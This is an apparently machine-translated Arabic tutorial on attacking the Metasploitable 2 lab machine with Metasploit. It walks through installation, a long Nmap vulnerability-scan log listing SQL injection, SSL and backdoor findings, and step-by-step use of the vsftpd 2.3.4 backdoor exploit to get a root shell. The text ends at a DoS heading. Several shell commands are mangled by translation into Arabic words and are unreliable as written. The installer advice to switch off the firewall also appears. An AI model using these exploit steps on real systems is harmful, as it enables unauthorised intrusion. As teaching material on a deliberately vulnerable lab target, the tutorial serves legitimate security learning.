--> 10 أمثلة لاستخدام Metasploit - Linux Hint - Cyber Security
Home استغلال ثغرات

10 أمثلة لاستخدام Metasploit - Linux Hint

10 أمثلة لاستخدام Metasploit - Linux Hint

 فئة منوعات |  July 30, 2021 09:54

Teachs.ru
Metasploit هو إطار أمني يأتي مع العديد من الأدوات لاستغلال النظام واختباره. يوضح هذا البرنامج التعليمي 10 أمثلة لهجمات القرصنة ضد هدف Linux. هدف Linux هو بيئة تدريب Metasploitable 2 OS ، وهي عرضة للخطر عمداً للمستخدمين لتعلم كيفية استغلال نقاط الضعف الخاصة بها. يركز هذا البرنامج التعليمي فقط على 10 هجمات metasploit محددة ، للحصول على معلومات حول تثبيت Metasploitable 2 اقرأ المزيد هنا.لتبدأ تحميل Metasploit.

في حالتي ، قمت بتنزيل الإصدار التجريبي المجاني من Metasploit Pro ، ولكن يمكنك الحصول على أي منها.
ستتطلب الشاشة التالية بعض معلوماتك الشخصية ، املأها لتمريرها إلى صفحة التنزيل:

تنزيل Metasploit لنظام التشغيل Linux:

امنح المثبت الذي قمت بتنزيله للتو حقوق التنفيذ عن طريق تشغيل:

chmod + x metasploit-latest-linux-x64-installer.run

ثم قم بتنفيذ Metasploit عن طريق تشغيل:

./metasploit-latest-linux-x64-installer.run

عندما ترى مطالبات واجهة المستخدم الرسومية للمثبت ، انقر فوق إلى الأمام لاستكمال:

في الشاشة التالية ، اقبل اتفاقية الترخيص وانقر فوق إلى الأمام:

اترك الدليل الافتراضي واضغط إلى الأمام:

عند سؤالك عما إذا كنت تريد تثبيت Metasploit كخدمة ، فإن التوصية ليست كذلك ، إذا قمت بذلك ، فستبدأ خدمة metasploit في كل مرة تقوم فيها بالتمهيد ، إذا ضغطت رقم سيتم إطلاق خدمة Metasploit بناءً على طلبك فقط. حدد اختيارك واضغط على Forward للمتابعة:

لتجنب التداخلات ، عند استخدام Metasploit ، قم بإيقاف تشغيل جدار الحماية الخاص بك ، اضغط على إلى الأمام لاستكمال:

ما لم يتم استخدام المنفذ الموضح بالفعل ، اضغط على إلى الأمام لاستكمال:

اترك المضيف المحلي واضغط إلى الأمام لاستكمال:

ثم لمتابعة التثبيت اضغط إلى الأمام لآخر مرة:

ستبدأ عملية التثبيت:

أخيرًا ، تم تثبيت Metasploit ، على الرغم من حقيقة أننا لن نعمل مع واجهة الويب Metasploit ، يمكنك وضع علامة عليها لإبقائها متاحة. صحافة ينهي إلى النهاية.

استكشاف أخطاء خطأ قاعدة بيانات Metasploit وإصلاحها:

في حالتي عندما أطلقت Metasploit ، أرجع الخطأ:

 لا يوجد دعم لقاعدة البيانات: تعذر الاتصال بالخادم: تم رفض الاتصال هل الخادم قيد التشغيل. على المضيف "localhost" (:: 1) وقبول اتصالات TCP / IP على المنفذ 7337؟ 

سبب هذا الخطأ هو عدم تثبيت التبعية PostgreSQL وخدمة metasploit أيضًا.

لحلها قم بتشغيل:

ملائم ثبيت postgresql

ثم ابدأ PostgreSQL عن طريق تشغيل:

سودو بدء خدمة postgresql

وأخيرًا ابدأ خدمة Metasploit:

سودو بدء metasploit الخدمة

الآن تشغيل msfconsole مرة أخرى وستلاحظ اختفاء الخطأ ونحن مستعدون لمهاجمة Metasploitable 2:

استخدام Metasploit لفحص الهدف بحثًا عن نقاط الضعف:

تتمثل الخطوة الأولى في فحص هدفنا لاكتشاف الخدمات ونقاط الضعف الموجودة عليه. من أجل تحقيق ذلك ، سنستخدم Nmap من Metasploit و NSE (محرك البرمجة النصية Nmap) المستخدم للكشف عن الثغرات الأمنية:

db_nmap -الخامس--النصي فولن 192.168.0.184

ملاحظة: يستبدل 192.168.0.184 لعنوان IP أو مضيفك المستهدف.

دعونا نحلل ناتج Nmap:

مهم: احتوى ناتج Nmap على أكثر من 4000 سطر ، لذلك تم تقصير الناتج وترك المعلومات ذات الصلة ليتم شرحها.

توضح الأسطر التالية فقط الأنواع الأولية من عمليات المسح التي تتضمن NSE و ARP Ping Scan ودقة DNS و SYN Stealth Scan. تم بالفعل شرح كل هذه الخطوات بوضوح على موقع linuxhint.com at مسح Nping و Nmap ARPاستخدام البرامج النصية nmap و مسح الشبح Nmap.

لاحظ أن NSE يحتوي على ما قبل التنفيذ ، أثناء تنفيذ الفحص ونصوص ما بعد التنفيذ والتي يتم تشغيلها قبل وأثناء وبعد بدء عملية الفحص وانتهائها.

msf5> db_nmap -v - script vuln 192.168.0.184. [*] Nmap: بدءًا من Nmap 7.70 ( https://nmap.org ) في 2020-02-04 16:56 -03. [*] Nmap: NSE: تم تحميل 103 نصوصًا للمسح الضوئي. [*] Nmap: NSE: Script Pre-scanning. [*] Nmap: بدء NSE في الساعة 16:56. [*] Nmap: اكتمل NSE في الساعة 16:57 ، انقضى 10.00 ثانية. [*] Nmap: بدء NSE في الساعة 16:57. [*] Nmap: اكتمل NSE في الساعة 16:57 ، انقضى 0.00 ثانية. [*] Nmap: بدء ARP Ping Scan في 16:57. [*] Nmap: مسح 192.168.0.184 [منفذ واحد] [*] Nmap: اكتمل مسح Ping ARP في الساعة 16:57 ، وانقضى 0.05 ثانية (إجمالي مضيف واحد) [*] Nmap: بدء تحليل DNS المتوازي لمضيف واحد. الساعة 16:57. [*] Nmap: حل DNS متوازي مكتمل لمضيف واحد. الساعة 16:57 ، انقضت 0.02 ثانية. [*] Nmap: بدء SYN Stealth Scan في الساعة 16:57. [*] Nmap: مسح 192.168.0.184 [1000 منفذ]

يوضح المقتطف التالي الخدمات المتوفرة في هدفنا:


[*] Nmap: تم اكتشاف منفذ مفتوح 25 / tcp على 192.168.0.184. [*] Nmap: اكتشف المنفذ المفتوح 80 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف منفذ مفتوح 445 / tcp على 192.168.0.184. [*] Nmap: اكتشف المنفذ المفتوح 139 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف المنفذ المفتوح 3306 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف المنفذ المفتوح 5900 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف منفذ مفتوح 22 / tcp على 192.168.0.184. [*] Nmap: اكتشف فتح المنفذ 53 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف منفذ مفتوح 111 / tcp على 192.168.0.184. [*] Nmap: اكتشف المنفذ المفتوح 21 / tcp على 192.168.0.184. [*] Nmap: اكتشف المنفذ المفتوح 23 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف منفذ مفتوح 1099 / tcp على 192.168.0.184. [*] Nmap: اكتشف فتح المنفذ 512 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف المنفذ المفتوح 1524 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف منفذ مفتوح 513 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف منفذ مفتوح 514 / tcp على 192.168.0.184. [*] Nmap: اكتشف المنفذ المفتوح 2121 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف منفذ مفتوح 6000 / tcp على 192.168.0.184. [*] Nmap: اكتشف المنفذ المفتوح 2049 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف المنفذ المفتوح 6667 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف المنفذ المفتوح 8009 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف المنفذ المفتوح 5432 / tcp على 192.168.0.184. [*] Nmap: تم اكتشاف منفذ مفتوح 8180 / tcp على 192.168.0.184. [*] Nmap: اكتمل SYN Stealth Scan في الساعة 16:57 ، وانقضى 0.12 ثانية (إجمالي 1000 منفذ)

تقرير الاستخراج التالي NSE بعد تنفيذ البرامج النصية للبحث عن الثغرات الأمنية:


[*] Nmap: NSE: مسح البرنامج النصي 192.168.0.184. [*] Nmap: بدء NSE في الساعة 16:57. [*] Nmap: اكتمل NSE الساعة 17:02 ، انقضى 322.44 ثانية. [*] Nmap: بدء NSE الساعة 17:02. [*] Nmap: اكتمل NSE الساعة 17:02 ، انقضى 0.74 ثانية. [*] Nmap: تقرير فحص Nmap لـ 192.168.0.184. [*] Nmap: المضيف يعمل (زمن انتقال 0.00075 ثانية). [*] Nmap: غير معروض: 977 منفذًا مغلقًا. 

كما ترى ، وجدت Nmap بالفعل ثغرات أمنية أو ثغرات أمنية في خدمة FTP المستهدفة ، بل إنها تربطنا بمآثر لاختراق الهدف:

[*] Nmap: PORT STATE SERVICE. [*] Nmap: 21 / برنامج التعاون الفني فتح بروتوكول نقل الملفات. [*] Nmap: | ftp-vsftpd-backdoor: [*] Nmap: | ضعيف: [*] Nmap: | vsFTPd الإصدار 2.3.4 backdoor. [*] Nmap: | الحالة: VULNERABLE (قابلة للاستغلال) [*] Nmap: | المعرفات: OSVDB: 73573 CVE: CVE-2011-2523. [*] Nmap: | vsFTPd الإصدار 2.3.4 backdoor ، تم الإبلاغ عن ذلك في 2011-07-04. [*] Nmap: | تاريخ الإفصاح: 2011-07-03. [*] Nmap: | نتائج استغلال: [*] Nmap: | أمر شل: id. [*] Nmap: | النتائج: uid = 0 (root) gid = 0 (root) [*] Nmap: | المراجع: [*] Nmap: | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html. [*] Nmap: | http://osvdb.org/73573. [*] Nmap: | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/ يونكس / بروتوكول نقل الملفات / vsftpd_234_backdoor.rb. [*] Nmap: | _ https://cve.mitre.org/cgi-bin/cvename.cgi? الاسم = CVE-2011-2523.

أدناه يمكنك أن ترى ، بالإضافة إلى ثغرات أمان FTP ، اكتشف Nmap ثغرات SSL:

[*] Nmap: | _sslv2-drown: [*] Nmap: 22 / tcp open ssh. [*] Nmap: 23 / tcp افتح telnet. [*] Nmap: 25 / tcp فتح بروتوكول نقل البريد الإلكتروني. [*] Nmap: | smtp-vuln-cve2010-4344: [*] Nmap: | _ خادم SMTP ليس Exim: NOT VULNERABLE. [*] Nmap: | ssl-dh-params: [*] Nmap: | ضعيف: [*] Nmap: | مجهول Diffie-Hellman Key Exchange MitM الضعف. [*] Nmap: | الدولة: ضعيف. [*] Nmap: | خدمات أمان طبقة النقل (TLS) التي تستخدم مجهول الهوية. [*] Nmap: | لا يوفر تبادل مفاتيح Diffie-Hellman سوى الحماية من السلبية. [*] Nmap: | التنصت ، وتكون عرضة لهجمات الرجل في الوسط النشطة. [*] Nmap: | والتي يمكن أن تعرض السرية والنزاهة للخطر تمامًا. [*] Nmap: | من أي بيانات تم تبادلها خلال الجلسة الناتجة. [*] Nmap: | نتائج التحقق: [*] Nmap: | مجموعة DH المجهولة 1. [*] Nmap: | مجموعة التشفير: TLS_DH_anon_WITH_AES_256_CBC_SHA. [*] Nmap: | نوع المعامل: رئيس آمن. [*] Nmap: | مصدر المعامل: postfix مدمج. [*] Nmap: | طول المعامل: 1024. [*] Nmap: | طول المولد: 8. [*] Nmap: | طول المفتاح العمومي: 1024. [*] Nmap: | المراجع: [*] Nmap: | https://www.ietf.org/rfc/rfc2246.txt. [*] Nmap: | [*] Nmap: | بروتوكول أمان طبقة النقل (TLS) DHE_EXPORT Ciphers Downgrade MitM (Logjam) [*] Nmap: | الدولة: ضعيف. [*] Nmap: | المعرفات: OSVDB: 122331 CVE: CVE-2015-4000. [*] Nmap: | يحتوي بروتوكول أمان طبقة النقل (TLS) على عيب. [*] Nmap: | يتم تشغيله عند التعامل مع تبادلات مفاتيح Diffie-Hellman المحددة بـ. [*] Nmap: | تشفير DHE_EXPORT. قد يسمح هذا لمهاجم الرجل في الوسط. [*] Nmap: | لتقليل مستوى أمان جلسة TLS إلى مستوى تصدير 512 بت. [*] Nmap: | التشفير ، وهو أضعف بكثير ، يسمح للمهاجم. [*] Nmap: | لكسر التشفير والمراقبة أو العبث بسهولة أكبر. [*] Nmap: | الدفق المشفر. [*] Nmap: | تاريخ الإفصاح: 2015-5-19. [*] Nmap: | نتائج الفحص: [*] Nmap: | مجموعة التصدير-الدرجة DH 1. [*] Nmap: | مجموعة التشفير: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA. [*] Nmap: | نوع المعامل: رئيس آمن. [*] Nmap: | مصدر المعامل: غير معروف / تم إنشاؤه حسب الطلب. [*] Nmap: | طول المعامل: 512. [*] Nmap: | طول المولد: 8. [*] Nmap: | طول المفتاح العمومي: 512. [*] Nmap: | المراجع: [*] Nmap: | https://weakdh.org. [*] Nmap: | http://osvdb.org/122331. [*] Nmap: | https://cve.mitre.org/cgi-bin/cvename.cgi? الاسم = CVE-2015-4000. [*] Nmap: | [*] Nmap: | Diffie-Hellman Key Exchange قوة المجموعة غير كافية. [*] Nmap: | الدولة: ضعيف. [*] Nmap: | خدمات أمان طبقة النقل (TLS) التي تستخدم مجموعات Diffie-Hellman. [*] Nmap: | من القوة غير الكافية ، خاصة أولئك الذين يستخدمون واحدًا من قلة شائعة. [*] Nmap: | المجموعات المشتركة ، قد تكون عرضة لهجمات التنصت السلبي. [*] Nmap: | نتائج الفحص: [*] Nmap: | ضعيف مجموعة DH 1. [*] Nmap: | مجموعة التشفير: TLS_DHE_RSA_WITH_DES_CBC_SHA. [*] Nmap: | نوع المعامل: رئيس آمن. [*] Nmap: | مصدر المعامل: postfix مدمج. [*] Nmap: | طول المعامل: 1024. [*] Nmap: | طول المولد: 8. [*] Nmap: | طول المفتاح العمومي: 1024. [*] Nmap: | المراجع: [*] Nmap: | _ https://weakdh.org. [*] Nmap: | ssl-poodle: [*] Nmap: | ضعيف: [*] Nmap: | تسرب معلومات SSL POODLE. [*] Nmap: | الدولة: ضعيف. [*] Nmap: | المعرفات: OSVDB: 113251 CVE: CVE-2014-3566. [*] Nmap: | بروتوكول SSL 3.0 ، كما هو مستخدم في OpenSSL من خلال 1.0.1i وغيرها. [*] Nmap: | المنتجات ، تستخدم حشوة CBC غير محددة ، مما يجعلها أسهل. [*] Nmap: | لمهاجمي man-in-the-middle للحصول على بيانات نصية واضحة عبر ملف. [*] Nmap: | هجوم padding-oracle ، المعروف أيضًا باسم مشكلة "POODLE". [*] Nmap: | تاريخ الإفصاح: 2014/10/14. [*] Nmap: | نتائج الفحص: [*] Nmap: | TLS_RSA_WITH_AES_128_CBC_SHA. [*] Nmap: | المراجع: [*] Nmap: | https://cve.mitre.org/cgi-bin/cvename.cgi? الاسم = CVE-2014-3566. [*] Nmap: | https://www.openssl.org/~bodo/ssl-poodle.pdf. [*] Nmap: | https://www.imperialviolet.org/2014/10/14/poodle.html. [*] Nmap: | _ http://osvdb.org/113251. [*] Nmap: | sslv2- يغرق: [*] Nmap: | الأصفار: [*] Nmap: | SSL2_RC4_128_EXPORT40_WITH_MD5. [*] Nmap: | SSL2_DES_192_EDE3_CBC_WITH_MD5. [*] Nmap: | SSL2_RC2_128_CBC_WITH_MD5. [*] Nmap: | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5. [*] Nmap: | SSL2_RC4_128_WITH_MD5. [*] Nmap: | SSL2_DES_64_CBC_WITH_MD5. [*] Nmap: | فولنز: [*] Nmap: | CVE -201703: [*] Nmap: | العنوان: OpenSSL: استرجاع مفتاح جلسة فرق تسد في SSLv2. [*] Nmap: | الدولة: ضعيف. [*] Nmap: | المعرفات: [*] Nmap: | CVE: CVE -2017703. [*] Nmap: | الوصف: [*] Nmap: | الدالة get_client_master_key في s2_srvr.c في تطبيق SSLv2 في. [*] Nmap: | OpenSSL قبل 0.9.8zf و 1.0.0 قبل 1.0.0r و 1.0.1 قبل 1.0.1 م و 1.0.2 قبله. [*] Nmap: | 1.0.2a يقبل قيمة غير صفرية CLIENT-MASTER-KEY CLEAR-KEY-LENGTH لعنصر عشوائي. [*] Nmap: | التشفير ، والذي يسمح لمهاجمي man-in-the-middle بتحديد قيمة MASTER-KEY. [*] Nmap: | وفك تشفير بيانات نص تشفير TLS عن طريق الاستفادة من أوراكل Bleichenbacher RSA ، أ. [*] Nmap: | المشكلة ذات الصلة بـ CVE-11800. [*] Nmap: | [*] Nmap: | المراجع: [*] Nmap: | https://cve.mitre.org/cgi-bin/cvename.cgi? الاسم = CVE --2017703. [*] Nmap: | https://www.openssl.org/news/secadv/20160301.txt.

يوضح المقتطف التالي أنه تم العثور على الكثير من الثغرات الأمنية على خادم الويب بما في ذلك الوصول إلى صفحات تسجيل الدخول المعقولة ونقاط ضعف رفض الخدمة.

[*] Nmap: 53 / tcp مجال مفتوح. [*] Nmap: 80 / tcp http مفتوح. [*] Nmap: | http-csrf: [*] Nmap: | Spidering تقتصر على: maxdepth = 3 ؛ maxpagecount = 20 ؛ ضمن المضيف = 192.168.0.184. [*] Nmap: | تم العثور على الثغرات الأمنية CSRF المحتملة التالية: [*] Nmap: | [*] Nmap: | طريق: http://192.168.0.184:80/dvwa/ [*] Nmap: | معرّف النموذج: [*] Nmap: | إجراء النموذج: login.php. [*] Nmap: | [*] Nmap: | طريق: http://192.168.0.184:80/dvwa/login.php. [*] Nmap: | معرف النموذج: [*] Nmap: | _ إجراء النموذج: login.php. [*] Nmap: | _http-dombased-xss: تعذر العثور على أي XSS يعتمد على DOM. [*] Nmap: | تعداد http: [*] Nmap: | / tikiwiki /: Tikiwiki. [*] Nmap: | / test /: صفحة الاختبار. [*] Nmap: | /phpinfo.php: ملف معلومات محتمل. [*] Nmap: | / phpMyAdmin /: phpMyAdmin. [*] Nmap: | / doc /: دليل مثير للاهتمام محتمل مع سرد على "apache / 2.2.8 (ubuntu) dav / 2" [*] Nmap: | / icons /: مجلد من المحتمل أن يكون مثيرًا للاهتمام مع قائمة بالدليل. [*] Nmap: | _ / index /: مجلد مثير للاهتمام. [*] Nmap: | http-slowloris-check: [*] Nmap: | ضعيف: [*] Nmap: | هجوم Slowloris DOS. [*] Nmap: | الدولة: عرضة للخطر على الأرجح. [*] Nmap: | المعرفات: CVE: CVE-2007-6750. [*] Nmap: | يحاول Slowloris إبقاء العديد من الاتصالات بخادم الويب المستهدف مفتوحة مع الاستمرار. [*] Nmap: | فتحها لأطول فترة ممكنة. يتم تحقيق ذلك عن طريق فتح الاتصالات بـ. [*] Nmap: | خادم الويب الهدف وإرسال طلب جزئي. من خلال القيام بذلك ، فإنه يتضور جوعا. [*] Nmap: | موارد خادم http التي تتسبب في رفض الخدمة. [*] Nmap: | [*] Nmap: | تاريخ الإفصاح: 2009-09-17. [*] Nmap: | المراجع: [*] Nmap: | http://ha.ckers.org/slowloris/ [*] Nmap: | _ https://cve.mitre.org/cgi-bin/cvename.cgi? الاسم = CVE-2007-6750.

في هذه المرحلة ، عثر Nmap على الكثير من الثغرات الأمنية لحقن SQL ، وكانت كمية الثغرات الأمنية كبيرة جدًا في هذا البرنامج التعليمي ، فقد أزلت العديد منها وتركت بعضها:

[*] Nmap: | http-sql-injection: [*] Nmap: | ممكن sqli للاستعلامات: [*] Nmap: | http://192.168.0.184:80/dav/?C=N%3bO%3dD%27%20OR%20sqlspider. [*] Nmap: | http://192.168.0.184:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider. [*] Nmap: | http://192.168.0.184:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider. [*] Nmap: | http://192.168.0.184:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? page = pen-test-tool-lookup.php٪ 27٪ 20OR٪ 20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? page = الوثائق٪ 2fvulnerabilities.php٪ 27٪ 20OR٪ 20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? page = capture-data.php٪ 27٪ 20OR٪ 20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? page = text-file-viewer.php٪ 27٪ 20OR٪ 20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? الصفحة = register.php٪ 27٪ 20OR٪ 20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? page = html5-storage.php٪ 27٪ 20OR٪ 20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? page = user-info.php٪ 27٪ 20OR٪ 20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? page = home.php & do = toggle-hints٪ 27٪ 20OR٪ 20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? page = show-log.php٪ 27٪ 20OR٪ 20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? page = notes.php٪ 27٪ 20OR٪ 20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? الصفحة = Framing.php٪ 27٪ 20OR٪ 20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? page = php-errors.php٪ 27٪ 20OR٪ 20sqlspider. [*] Nmap: | http://192.168.0.184:80/mutillidae/index.php? page = home.php & do = toggle-security٪ 27٪ 20OR٪ 20sqlspider.

أدناه Nmap يتجاهل ثغرات XSS مرة أخرى (كما في المقتطف الأول) والتقارير

ثغرات أمنية في استدعاء الطريقة عن بعد (RMI) بسبب التكوين الخاطئ الذي يسمح للمهاجمين بالسماح بتنفيذ تعليمات Java البرمجية الضارة:

[*] Nmap: | _http-store-xss: تعذر العثور على أي ثغرات أمنية مخزنة في XSS. [*] Nmap: | _http-trace: تم تمكين TRACE. [*] Nmap: | _http-vuln-cve2017-1001000: خطأ: فشل تنفيذ البرنامج النصي (استخدم -d لتصحيح الأخطاء) [*] Nmap: 111 / tcp فتح rpcbind. [*] Nmap: 139 / tcp open netbios-ssn. [*] Nmap: 445 / tcp افتح Microsoft-ds. [*] Nmap: 512 / tcp open exec. [*] Nmap: 513 / برنامج التعاون الفني تسجيل الدخول المفتوح. [*] Nmap: 514 / tcp غلاف مفتوح. [*] Nmap: 1099 / tcp فتح rmiregistry. [*] Nmap: | rmi-vuln-classloader: [*] Nmap: | ضعيف: [*] Nmap: | ثغرة أمنية في تنفيذ التكوين الافتراضي لسجل RMI. [*] Nmap: | الدولة: ضعيف. [*] Nmap: | يسمح التكوين الافتراضي لسجل RMI بتحميل الفئات من عناوين URL البعيدة والتي يمكن أن تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد. [*] Nmap: | [*] Nmap: | المراجع: [*] Nmap: | _ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/ متفرقات / java_rmi_server.rb.

أدناه يمكنك رؤية ثغرات أمنية إضافية في SSL تم العثور عليها:

[*] Nmap: | ssl-ccs-injection: [*] Nmap: | ضعيف: [*] Nmap: | ثغرة أمنية في SSL / TLS MITM (CCS Injection) [*] Nmap: | الدولة: ضعيف. [*] Nmap: | عامل الخطر: مرتفع. [*] Nmap: | OpenSSL قبل 0.9.8za و 1.0.0 قبل 1.0.0 م و 1.0.1 قبل 1.0.1 ساعة. [*] Nmap: | لا يقيد بشكل صحيح معالجة رسائل ChangeCipherSpec ، [*] Nmap: | الذي يسمح لمهاجمي man-in-the-middle ببدء استخدام الصفر. [*] Nmap: | طول المفتاح الرئيسي في بعض اتصالات OpenSSL إلى OpenSSL ، و. [*] Nmap: | وبالتالي اختطاف الجلسات أو الحصول على معلومات حساسة عبر. [*] Nmap: | مصافحة TLS المصنعة ، والمعروفة أيضًا بالثغرة الأمنية "CCS Injection". [*] Nmap: | [*] Nmap: | المراجع: [*] Nmap: | https://cve.mitre.org/cgi-bin/cvename.cgi? الاسم = CVE-2014-0224. [*] Nmap: | http://www.cvedetails.com/cve/2014-0224. [*] Nmap: | _ http://www.openssl.org/news/secadv_20140605.txt. [*] Nmap: | ssl-dh-params: [*] Nmap: | ضعيف: [*] Nmap: | Diffie-Hellman Key Exchange قوة المجموعة غير كافية. [*] Nmap: | الدولة: ضعيف. [*] Nmap: | خدمات أمان طبقة النقل (TLS) التي تستخدم مجموعات Diffie-Hellman. [*] Nmap: | من القوة غير الكافية ، خاصة أولئك الذين يستخدمون واحدًا من قلة شائعة. [*] Nmap: | المجموعات المشتركة ، قد تكون عرضة لهجمات التنصت السلبي. [*] Nmap: | نتائج الفحص: [*] Nmap: | ضعيف مجموعة DH 1. [*] Nmap: | مجموعة التشفير: TLS_DHE_RSA_WITH_AES_128_CBC_SHA. [*] Nmap: | نوع المعامل: رئيس آمن. [*] Nmap: | مصدر المعامل: غير معروف / تم إنشاؤه حسب الطلب. [*] Nmap: | طول المعامل: 1024. [*] Nmap: | طول المولد: 8. [*] Nmap: | طول المفتاح العمومي: 1024. [*] Nmap: | المراجع: [*] Nmap: | _ https://weakdh.org. [*] Nmap: | ssl-poodle: [*] Nmap: | ضعيف: [*] Nmap: | تسرب معلومات SSL POODLE. [*] Nmap: | الدولة: ضعيف. [*] Nmap: | المعرفات: OSVDB: 113251 CVE: CVE-2014-3566. [*] Nmap: | بروتوكول SSL 3.0 ، كما هو مستخدم في OpenSSL من خلال 1.0.1i وغيرها.

يُظهر المقتطف التالي أن هدفنا ربما يكون مصابًا بأحد طروادة مقابل خدمة IRC:


[*] Nmap: | _irc-unrealircd-backdoor: يبدو وكأنه نسخة طروادة من unrealircd. يرى http://seclists.org/fulldisclosure/2010/Jun/277. [*] Nmap: 8009 / tcp open ajp13. 

يوضح المقتطف التالي أن علامة httponly لم يتم تكوينها بشكل صحيح ، وبالتالي يكون الهدف عرضة لهجمات البرمجة النصية عبر المواقع:


[*] Nmap: 8180 / tcp مفتوح غير معروف. [*] Nmap: | http-cookie-flags: [*] Nmap: | / admin /: [*] Nmap: | JSESSIONID: [*] Nmap: | لم يتم تعيين علامة httponly. [*] Nmap: | /admin/index.html: [*] Nmap: | JSESSIONID: [*] Nmap: | لم يتم تعيين علامة httponly. [*] Nmap: | /admin/login.html: [*] Nmap: | JSESSIONID: [*] Nmap: | لم يتم تعيين علامة httponly. [*] Nmap: | /admin/admin.html: [*] Nmap: | JSESSIONID: [*] Nmap: | لم يتم تعيين علامة httponly. [*] Nmap: | /admin/account.html: [*] Nmap: | JSESSIONID: [*] Nmap: | لم يتم تعيين علامة httponly. [*] Nmap: | /admin/admin_login.html: [*] Nmap: | JSESSIONID: [*] Nmap: | لم يتم تعيين علامة httponly. [*] Nmap: | /admin/home.html: 

يعدد المقتطف التالي أو يسرد أدلة مثيرة للاهتمام يمكن الوصول إليها على هدفنا:


[*] Nmap: | تعداد http: [*] Nmap: | / admin /: مجلد مشرف محتمل. [*] Nmap: | /admin/index.html: مجلد مسؤول محتمل. [*] Nmap: | /admin/login.html: مجلد مسؤول محتمل. [*] Nmap: | /admin/admin.html: مجلد مسؤول محتمل. [*] Nmap: | /admin/account.html: مجلد مسؤول محتمل. [*] Nmap: | /admin/admin_login.html: مجلد مسؤول محتمل. [*] Nmap: | /admin/home.html: مجلد مسؤول محتمل. [*] Nmap: | /admin/admin-login.html: مجلد مسؤول محتمل. [*] Nmap: | /admin/adminLogin.html: مجلد مسؤول محتمل. [*] Nmap: | /admin/controlpanel.html: مجلد مسؤول محتمل. [*] Nmap: | /admin/cp.html: مجلد مسؤول محتمل. [*] Nmap: | /admin/index.jsp: مجلد مشرف محتمل. 

أخيرًا ، ينتهي الفحص ويتم تنفيذ NSE بعد المسح:

[*] Nmap: | [*] Nmap: | تاريخ الإفصاح: 2009-09-17. [*] Nmap: | المراجع: [*] Nmap: | http://ha.ckers.org/slowloris/ [*] Nmap: | _ https://cve.mitre.org/cgi-bin/cvename.cgi? الاسم = CVE-2007-6750. [*] Nmap: عنوان MAC: 08: 00: 27: DD: 87: 8C (Oracle VirtualBox virtual NIC) [*] Nmap: نتائج البرنامج النصي للمضيف: [*] Nmap: | _smb-vuln-ms10-054: false. [*] Nmap: | _smb-vuln-ms10-061: خطأ. [*] Nmap: NSE: Script Post-scanning. [*] Nmap: بدء NSE الساعة 17:02. [*] Nmap: اكتمل NSE في الساعة 17:02 ، انقضى 0.00 ثانية. [*] Nmap: بدء NSE الساعة 17:02. [*] Nmap: اكتمل NSE في الساعة 17:02 ، انقضى 0.00 ثانية. [*] Nmap: قراءة ملفات البيانات من: / opt / metasploit / common / share / nmap / [*] Nmap: تم إجراء Nmap: تم فحص عنوان IP واحد (مضيف واحد) في 333.96 ثانية. [*] Nmap: الحزم الأولية المرسلة: 1001 (44.028 كيلو بايت) | Rcvd: 1001 (40.120 كيلو بايت) msf5>

الآن حددنا بعض الثغرات الأمنية لمهاجمة هدفنا.

استخدام Metasploit لاختراق خادم FTP:

بمجرد تحديد الثغرات الأمنية على هدفك ، استخدم أوامر Metasploit للعثور على الثغرات المناسبة ضدهم. كما رأيت سابقًا ، كانت إحدى أولى الثغرات الأمنية التي تم العثور عليها موجودة على خادم vsFTPD ، للعثور على الثغرات المناسبة ، ضمن تشغيل Metasploit:

البحث vsftpd

كما ترى ، يحتوي Metasploit على باب خلفي قد يساعدنا في اختراق FTP المستهدف. لاستخدام هذا الاستغلال ، ضمن تشغيل Metasploit:

استخدام استغلال/يونكس/بروتوكول نقل الملفات/vsftpd_234_backdoor

لمعرفة كيفية استخدام أي استغلال محدد:

عرض الخيارات

كما ترى أعلاه ، يحتوي هذا الاستغلال على خيارين ، RHOSTS (مضيف بعيد) و RPORT. نحتاج إلى تحديد RHOST ، المنفذ محدد بالفعل (21).
لتعيين المضيف البعيد (RHOST) الذي يحدد تشغيل IP الهدف:

تعيين RHOST 192.168.0.184

بمجرد تحديد الهدف ، قم بتشغيل الأمر التالي لاستغلال الثقب الأمني:

استغلال

كما ترون ، حصلت على قذيفة في الهدف ، عند تشغيل "ls" يمكنني رؤية الملفات الهدف ، نجح الهجوم. لمغادرة الهدف فقط ركض:

#خروج

استخدام Metasploit لهجوم DOS:

